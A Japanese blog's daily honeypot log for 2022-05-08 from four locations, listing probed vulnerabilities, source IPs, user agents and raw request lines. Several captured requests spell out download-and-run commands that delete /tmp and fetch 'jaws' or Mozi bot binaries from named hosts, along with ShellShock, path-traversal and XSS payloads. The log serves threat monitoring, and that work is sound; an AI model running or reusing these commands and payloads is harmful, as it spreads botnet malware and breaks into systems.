コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/05/08 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/05/08分です。

特徴
共通

Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  cnc.krakenbit.net/jaws;
sh /tmp/jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ShellShock(CVE-2014-7169)脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Niktoによるスキャン行為
aiohttpによるスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 27.254.163.205/jaws;
sh /tmp/jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws
Location:SG

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:307 (前日比:204) US:総アクセス数:2587 (前日比:2412) UK:総アクセス数:273 (前日比:-113) SG:総アクセス数:180 (前日比:-122)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.86 Romania
1 5.252.194.39 Russia
1 20.110.121.91 United States
1 20.126.42.244 United States
2 34.229.88.142 United States
119 36.46.140.196 China
3 40.82.192.115 United States
1 44.192.29.193 United States
1 45.61.188.169 United States
1 45.151.167.12 Germany
1 66.249.79.155 United States
14 95.214.235.205 Ukraine
2 109.237.103.38 Russia
1 110.255.223.246 China
1 122.114.4.137 China
7 135.125.217.54 France
5 135.125.246.110 France
1 137.184.122.128 United States
119 138.19.231.181 Hong Kong
1 142.93.194.204 United States
2 157.245.70.127 United States
1 159.65.37.143 United States
1 180.149.125.170 Mongolia
1 185.28.39.119 Netherlands
8 185.254.196.217 Ukraine
1 192.241.212.132 United States
1 192.241.221.54 United States
1 192.241.222.247 United States
2 193.56.29.26 United Kingdom
1 193.169.245.97 Ukraine
1 196.89.220.225 Morocco
1 205.210.31.139 United States
1 206.189.224.36 United States
1 209.127.181.88 Canada
1 212.192.241.17 Czechia

UserAgent一覧

件数 UserAgent
7 -
4 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
238 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
46 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.22.0
2 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01C\x01
1 \x16\x03\x01
48 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET //admin/config.php HTTP/1.1
2 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/index.php?lang=en HTTP/1.1
2 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/pma/index.php?lang=en HTTP/1.1
2 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
2 GET /administrator/PMA/index.php?lang=en HTTP/1.1
2 GET /administrator/admin/index.php?lang=en HTTP/1.1
2 GET /administrator/db/index.php?lang=en HTTP/1.1
2 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
2 GET /db/dbadmin/index.php?lang=en HTTP/1.1
2 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /db/webadmin/index.php?lang=en HTTP/1.1
2 GET /db/webdb/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
2 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /myadmin/index.php?lang=en HTTP/1.1
2 GET /mysql-admin/index.php?lang=en HTTP/1.1
2 GET /mysql/admin/index.php?lang=en HTTP/1.1
2 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
2 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/web/index.php?lang=en HTTP/1.1
2 GET /mysqladmin/index.php?lang=en HTTP/1.1
2 GET /mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /php-myadmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
2 GET /phpMyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
2 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
2 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
2 GET /program/index.php?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//110[.]255[.]223[.]246:50250/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws
2 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
2 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
2 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
2 GET /sql/webadmin/index.php?lang=en HTTP/1.1
2 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
2 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /yuuki?pp=env HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /cgi-bin/../../../../bin/sh HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.92.243.94 United States
8 20.211.101.106 United States
7 45.9.20.101 Russia
2 45.148.10.81 Romania
2 45.227.254.26 Belize
1 46.101.157.178 United States
1 46.249.33.53 Netherlands
8 51.79.29.48 Canada
1 51.142.150.133 United Kingdom
1 52.173.242.38 United States
2 66.115.182.111 United States
1 66.240.205.34 United States
1 70.73.177.103 Canada
2 94.232.41.214 Russia
2 109.237.103.38 Russia
1 121.46.25.189 China
1 144.91.123.204 Germany
2 157.245.70.127 United States
1 159.65.37.143 United States
1 159.223.180.164 United States
1 162.142.125.10 United States
1 167.248.133.45 United States
1 173.255.225.158 United States
2 179.43.133.218 Panama
2 180.149.125.170 Mongolia
2519 182.200.57.228 China
1 185.28.39.119 Netherlands
7 185.254.196.223 Ukraine
1 192.241.213.229 United States
1 192.241.221.40 United States
1 198.235.24.135 United States
1 198.235.24.138 United States
1 205.210.31.25 United States
2 206.189.224.36 United States

UserAgent一覧

件数 UserAgent
120 () { :; }; echo Nikto-Added-CVE-2014-6271: true;echo;echo;
30 -
1 2.0.1) Gecko/20100101 Firefox/4.0.1\"
4 Go-http-client/1.1
1 Hello, world
9 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
2 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
18 Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
20 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1843 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:00[0-9]{4})
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:apacheusers: known user)
23 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:cgi dir check)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:clientaccesspolicy)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:crossdomain)
9 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:embedded detection)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:favicon)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: IIS internal IP)
6 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: WebLogic internal IP)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: DEBUG)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: Junk HTTP method)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: OPTIONS *)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: OPTIONS /)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: PROPFIND)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: TRACE)
2 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:httpoptions: TRACK)
217 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes)
16 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:multiple_index)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:negotiate)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:put_del_test: PUT)
1 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:robots)
234 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles)
1 Python/3.7 aiohttp/3.7.4.post0
1 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
4 \x03
1 \x16\x03\x01\x01C\x01
1 \x16\x03\x01\x02
3 \x16\x03\x01
2 CONNECT wfuchs[.]de:443 HTTP/1.1
1 DEBUG / HTTP/1.1
1 GET ../../../../../../../../../../etc/* HTTP/1.1
1 GET ../../../../../../../../../../etc/passw* HTTP/1.1
1 GET . HTTP/1.0
3 GET /%00/ HTTP/1.1
1 GET /%00 HTTP/1.1
1 GET /%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp HTTP/1.1
1 GET /%22%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1
1 GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
3 GET /%2e/ HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini HTTP/1.1
3 GET /%2f/ HTTP/1.1
1 GET /%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1
1 GET /%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1
1 GET /%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html HTTP/1.1
3 GET /%3f.jsp HTTP/1.1
3 GET /%5c/ HTTP/1.1
1 GET /%NETHOOD%/ HTTP/1.1
1 GET /%a%s%p%d HTTP/1.1
1 GET /&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.1
1 GET /*.* HTTP/1.1
1 GET /................../config.sys HTTP/1.1
1 GET /................../etc/passwd HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../boot.ini HTTP/1.1
1 GET /../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../boot.ini HTTP/1.1
1 GET /../../../../winnt/repair/sam._ HTTP/1.1
1 GET /../config.dat HTTP/1.1
1 GET /../webserver.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\temp\\temp.class HTTP/1.1
1 GET /..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini HTTP/1.1
2 GET /./ HTTP/1.1
1 GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.1
25 GET /.env HTTP/1.1
1 GET /.nsf/../winnt/win.ini HTTP/1.1
1 GET /.perf HTTP/1.1
1 GET /.psql_history HTTP/1.1
1 GET /.xFpZpuLF HTTP/1.1
1 GET ////./../.../boot.ini HTTP/1.1
1 GET /// HTTP/1.1
1 GET ///etc/hosts HTTP/1.1
1 GET ///etc/passwd HTTP/1.1
2 GET // HTTP/1.1
1 GET //admin/admin.shtml HTTP/1.1
1 GET //admin/aindex.htm HTTP/1.1
1 GET //comment[.]php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET //profiles[.]php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /0qKOG.htw HTTP/1.1
1 GET /2tLDrs.cfm?mode=debug HTTP/1.1
1 GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1
1 GET /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1
1 GET /5Nyo7.csp HTTP/1.1
1 GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1
1 GET /852566C90012664F HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.aspx HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.jsp HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.shtm HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.shtml HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.stm HTTP/1.1
1 GET /<script>alert('Vulnerable')</script>.thtml HTTP/1.1
1 GET /<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?OpenServer HTTP/1.1
1 GET /?Open HTTP/1.1
1 GET /?PageServices HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?mod=<script>alert(document.cookie)</script>&op=browse HTTP/1.1
1 GET /?mod=node&nid=some_thing&op=view HTTP/1.1
1 GET /?mod=some_thing&op=browse HTTP/1.1
1 GET /?sql_debug=1 HTTP/1.1
1 GET /?wp-cs-dump HTTP/1.1
1 GET /Admin/ HTTP/1.1
1 GET /Admin_files/ HTTP/1.1
1 GET /Admin_files/order.log HTTP/1.1
1 GET /Administration/ HTTP/1.1
1 GET /Agent/ HTTP/1.1
1 GET /Agentes/ HTTP/1.1
1 GET /Agents/ HTTP/1.1
1 GET /Asp/ HTTP/1.1
1 GET /BACLIENT HTTP/1.1
1 GET /CFIDE/probe.cfm HTTP/1.1
1 GET /COM HTTP/1.1
1 GET /CVS/Entries HTTP/1.1
1 GET /Config1.htm HTTP/1.1
1 GET /DB4Web/10[.]10[.]10[.]10:100 HTTP/1.1
1 GET /DMR/ HTTP/1.1
1 GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /EXE/ HTTP/1.1
1 GET /Excel/ HTTP/1.1
1 GET /FormMail-clone.cgi HTTP/1.1
1 GET /HyperStat/stat_what.log HTTP/1.1
1 GET /IDSWebApp/IDSjsp/Login.jsp HTTP/1.1
1 GET /ISSamples/SQLQHit.asp HTTP/1.1
1 GET /ISSamples/sqlqhit.asp HTTP/1.1
1 GET /IlohaMail/blank.html HTTP/1.1
1 GET /LOGIN.PWD HTTP/1.1
1 GET /LiveHelp/ HTTP/1.1
1 GET /MIDICART/midicart.mdb HTTP/1.1
1 GET /MSword/ HTTP/1.1
1 GET /Mem/dynaform/FileExplorer.htm HTTP/1.1
1 GET /Msword/ HTTP/1.1
1 GET /My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /NetDynamic/ HTTP/1.1
1 GET /NetDynamics/ HTTP/1.1
1 GET /OpenFile.aspx?file=../../../../../../../../../../boot.ini HTTP/1.1
1 GET /Orders/order_log.dat HTTP/1.1
1 GET /Orders/order_log_v12.dat HTTP/1.1
1 GET /PDG_Cart/ HTTP/1.1
1 GET /PDG_Cart/oder.log HTTP/1.1
1 GET /PDG_Cart/shopper.conf HTTP/1.1
1 GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1
1 GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /Pages/ HTTP/1.1
1 GET /Program%20Files/ HTTP/1.1
1 GET /ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /SPHERA/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /SPHERA/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /SQLQHit.asp HTTP/1.1
1 GET /Search HTTP/1.1
1 GET /SetSecurity.shm HTTP/1.1
1 GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1
1 GET /SilverStream HTTP/1.1
1 GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1
1 GET /SiteScope/htdocs/SiteScope.html HTTP/1.1
1 GET /SiteServer/Admin/commerce/foundation/DSN.asp HTTP/1.1
1 GET /SiteServer/Admin/commerce/foundation/domain.asp HTTP/1.1
1 GET /SiteServer/Admin/commerce/foundation/driver.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/dsmgr/default.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp HTTP/1.1
1 GET /SiteServer/Admin/knowledge/persmbr/vs.asp HTTP/1.1
1 GET /SiteServer/Knowledge/Default.asp?ctr=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /SiteServer/admin/ HTTP/1.1
1 GET /SiteServer/admin/findvserver.asp HTTP/1.1
1 GET /SoundBridgeStatus.html HTTP/1.1
1 GET /Survey/Survey.Htm HTTP/1.1
1 GET /TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes HTTP/1.1
1 GET /TiVoConnect?Command=QueryServer HTTP/1.1
1 GET /TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /USER/CONFIG.AP HTTP/1.1
1 GET /WEB-INF./web.xml HTTP/1.1
1 GET /WEB-INF/web.xml HTTP/1.1
1 GET /WEBAGENT/CQMGSERV/CF-SINFO.TPF HTTP/1.1
1 GET /WS_FTP.LOG HTTP/1.1
1 GET /WS_FTP.ini HTTP/1.1
1 GET /WebAdmin.dll?View=Logon HTTP/1.1
1 GET /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /XCFGvNRfT5 HTTP/1.1
1 GET /Xcelerate/LoginPage.html HTTP/1.1
1 GET /[SecCheck]/..%252f..%252f../ext.ini HTTP/1.1
1 GET /[SecCheck]/..%255c..%255c../ext.ini HTTP/1.1
1 GET /[SecCheck]/..%2f../ext.ini HTTP/1.1
1 GET /\\\"><img%20src=\\\"javascript:alert(document.domain)\\\"> HTTP/1.1
1 GET /_cti_pvt/ HTTP/1.1
2 GET /_mem_bin/auoconfig.asp HTTP/1.1
1 GET /_mem_bin/formslogin.asp?\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /_mem_bin/remind.asp HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.1
1 GET /_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1
1 GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
1 GET /_vti_bin/fpcount.exe/ HTTP/1.1
1 GET /_vti_bin/shtml.exe/junk_nonexistant.exe HTTP/1.1
1 GET /_vti_bin/shtml.exe HTTP/1.1
1 GET /_vti_pvt/access.cnf HTTP/1.1
1 GET /_vti_pvt/botinfs.cnf HTTP/1.1
1 GET /_vti_pvt/bots.cnf HTTP/1.1
1 GET /_vti_pvt/deptodoc.btr HTTP/1.1
